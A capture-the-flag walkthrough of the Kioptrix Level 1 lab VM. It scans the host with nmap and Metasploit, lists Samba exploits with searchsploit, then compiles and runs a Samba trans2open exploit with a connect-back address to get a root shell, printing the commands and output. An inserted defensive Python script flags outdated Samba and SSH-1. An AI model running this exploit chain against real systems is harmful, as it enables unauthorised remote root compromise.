Kioptrix: Level 1 (#1) walkthrough
First, scan the target with nmap:
# nmap -sV 192.168.140.144
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-03 08:45 EDT
Nmap scan report for 192.168.140.144
Host is up (0.0038s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:D3:35:1E (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.73 seconds
Quite a few ports are open (22, 80, 111, 139, 443, 1024), but searching for vulnerabilities in these services by the reported versions turned up nothing useful.
Port 139, however, is a comparatively risky one, and -sV could not determine the Samba version, so another method is needed to get further information. Metasploit's smb_version module returns the version:
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   THREADS  1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.140.144
RHOSTS => 192.168.140.144
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.140.144:139   - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.140.144:139   -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.140.144:      - Scanned 1 of 1 hosts (100% complete)
Look up which vulnerabilities exist for Samba 2.2:
└─# searchsploit Samba 2.2
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Samba 2.0.x/2.2 - Arbitrary File Creation                                             | unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                          | osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1)               | linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)                     | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation       | linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)                   | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)                     | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)               | solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution                             | linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                            | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)                            | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)                            | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)                            | unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)                                  | linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow               | unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow                                                  | linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                                     | multiple/remote/10.c
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                                     | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow                                                 | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                         | linux_x86/dos/36741.py
-------------------------------------------------------------------------------------- ---------------------------------
As you can see, there is exploit code here worth a closer look. I first tried Metasploit's own trans2open module, but it seemed hard to get working, so I turned to Samba < 2.2.8 (Linux/BSD) - Remote Code Execution.
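As an added example (not part of the original walkthrough), here is the defender-side check I would run over this kind of scan: it parses the nmap -sV port table from above, merges in the Samba banner that smb_version recovered for port 139, and flags the two weak points the scan exposed: a Samba release below 2.2.8 (the range the searchsploit hits target) and an SSH banner that still advertises protocol 1.99, meaning the obsolete SSH-1 protocol is accepted. The version threshold, the regular expressions and the inline sample input are assumptions of this example, not something the page provides.

```python
import re

# Constructed sample: the port table from the nmap -sV run above (copied by hand, not live output)
NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
"""
# Constructed sample: the banner smb_version reported for port 139
SMB_BANNER = "Unix (Samba 2.2.1a)"

# One nmap "normal output" port row: port/proto, state, service, free-text version
PORT_LINE = re.compile(r"^(\d+)/(?:tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Return {port: (service, version string)} for every open port in nmap normal output."""
    rows = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(2) == "open":
            rows[int(m.group(1))] = (m.group(3), m.group(4))
    return rows

def version_tuple(s):
    """'2.2.1a' -> (2, 2, 1); trailing letters are ignored for the comparison."""
    return tuple(int(x) for x in re.findall(r"\d+", s))

# Assumed threshold (not from the page): the searchsploit hits above target Samba < 2.2.8
SAMBA_MIN = (2, 2, 8)
SAMBA_RE = re.compile(r"Samba (\d+\.\d+\.\d+\w*)")

def flag_findings(rows, smb_banner=None):
    """Merge the smb_version banner into port 139 (nmap alone could not fingerprint it) and flag weak services."""
    findings = []
    for port, (service, version) in sorted(rows.items()):
        if port == 139 and smb_banner:
            version = smb_banner
        m = SAMBA_RE.search(version)
        if m and version_tuple(m.group(1)) < SAMBA_MIN:
            findings.append((port, "samba-below-2.2.8", m.group(1)))
        # "protocol 1.99" means the server still negotiates SSH-1 with old clients
        if service == "ssh" and "protocol 1." in version:
            findings.append((port, "ssh-protocol-1-enabled", version))
    return findings

if __name__ == "__main__":
    for finding in flag_findings(parse_nmap(NMAP_OUTPUT), SMB_BANNER):
        print(finding)
```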
Use locate to find multiple/remote/10.c, copy it to the home directory, and compile it with gcc:
# locate multiple/remote/10.c
/usr/share/exploitdb/exploits/multiple/remote/10.c

┌──(root💀kali)-[/usr/…/exploitdb/exploits/multiple/remote]
└─# cp 10.c ~

┌──(root💀kali)-[/usr/…/exploitdb/exploits/multiple/remote]
└─# cd ~

┌──(root💀kali)-[~]
└─# gcc 10.c -o samba_jason
Then run the compiled binary: ./samba_jason
# ./samba_jason
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./samba_jason [-bBcCdfprsStv] [host]

-b <platform>    bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step>        bruteforce steps (default = 300)
-c <ip address>  connectback ip address
-C <max childs>  max childs for scan/bruteforce mode (default = 40)
-d <delay>       bruteforce/scanmode delay in micro seconds (default = 100000)
-f               force
-p <port>        port to attack (default = 139)
-r <ret>         return address
-s               scan mode (random)
-S <network>     scan mode
-t <type>        presets (0 for a list)
-v               verbose mode
└─# ./samba_jason -b 0 -c 192.168.140.138 -p 139 192.168.140.144
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
id
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
STRIVE FOR PROGRESS, NOT FOR PERFECTION